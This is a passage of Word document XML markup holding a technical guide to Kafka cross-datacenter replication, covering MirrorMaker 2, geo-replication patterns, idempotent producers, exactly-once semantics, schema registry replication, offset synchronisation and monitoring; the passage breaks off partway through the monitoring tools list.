    <w:p w14:paraId="3D424289" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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nsumer group offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF4C40" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="173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lastRenderedPageBreak/>
        <w:t>Configuration metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CFBDB" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F6DAC6" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Seamless </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-datacenter replication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33AC14" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Retains </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D666A" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Allows </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>failover and disaster recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EC0C2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1736"/>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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset translation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so consumers can resume processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A59A8E"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C272FBF"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nnect-mirror-maker.sh mm2.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F9D63" w14:textId="77777777" w:rsidR="00F22E41"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353AC68">
          <v:rect id="_x0000_i3325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D25A120" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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2. Geo-Replication Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A33160" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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Active-Passive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA0751" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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One cluster handles writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E7874A" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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he passive cluster is used for DR (Disaster Recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E0C0E" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1737"/>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Low conflict risk, simple to implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F615DB0" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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Active-Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4553F24B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Both clusters handle writes and reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082FA6B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1738"/>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Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflict resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDA62C"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage duplicates across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CD4E1" w14:textId="77777777" w:rsidR="00F22E41"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C09D48B">
          <v:rect id="_x0000_i3326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="392F8EFC" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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3. Enable Idempotent Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D2BD1"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rops.put("enable.idempotence", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6DBB2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173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Ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retries do not result in duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B735B9" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1739"/>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Important when using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MirrorMaker 2</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or custom replication logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94D001" w14:textId="77777777" w:rsidR="00F22E41"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02BAC45">
          <v:rect id="_x0000_i3327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC6905" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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4. Exactly Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33559033"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To ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exact delivery without duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489D4E2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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nable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8D291" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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nable.idempotence = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72F73D" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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acks = all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483D4F2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1740"/>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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Transactions API</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D366F" w14:textId="77777777" w:rsidR="00F22E41"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67C8963">
          <v:rect id="_x0000_i3328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E1718" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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5. Schema Registry Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78B43B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Schema Registry with Multi-Region support</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A72455" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent message formats</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229B61B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1741"/>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revents schema mismatches that may lead to consumer errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C12EE" w14:textId="77777777" w:rsidR="00F22E41"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2AF8F41">
          <v:rect id="_x0000_i3329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF2E99" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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6. Offset Synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B5A0F"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irrorMaker 2 replicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAA6F2" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Consumer group offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78438646" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1742"/>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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset translation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to keep consumers in sync between clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51832F14"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Useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>failover</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenarios without starting from the beginning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B1F1A7" w14:textId="77777777" w:rsidR="00F22E41"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41786DB">
          <v:rect id="_x0000_i3330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35904FE9" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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7. Consistent Configuration Across Clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5678FB"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nsure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C1F22" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Same </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF32F31" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Same </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6674D1" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1743"/>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Similar </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retention</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C663F"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This ensures smooth failover and data compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B3D13" w14:textId="77777777" w:rsidR="00F22E41"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59D5C05">
          <v:rect id="_x0000_i3331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C32F8F6" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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8. Monitoring and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85E742" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Use tools like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E05AC6A" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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Prometheus + Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB42565" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
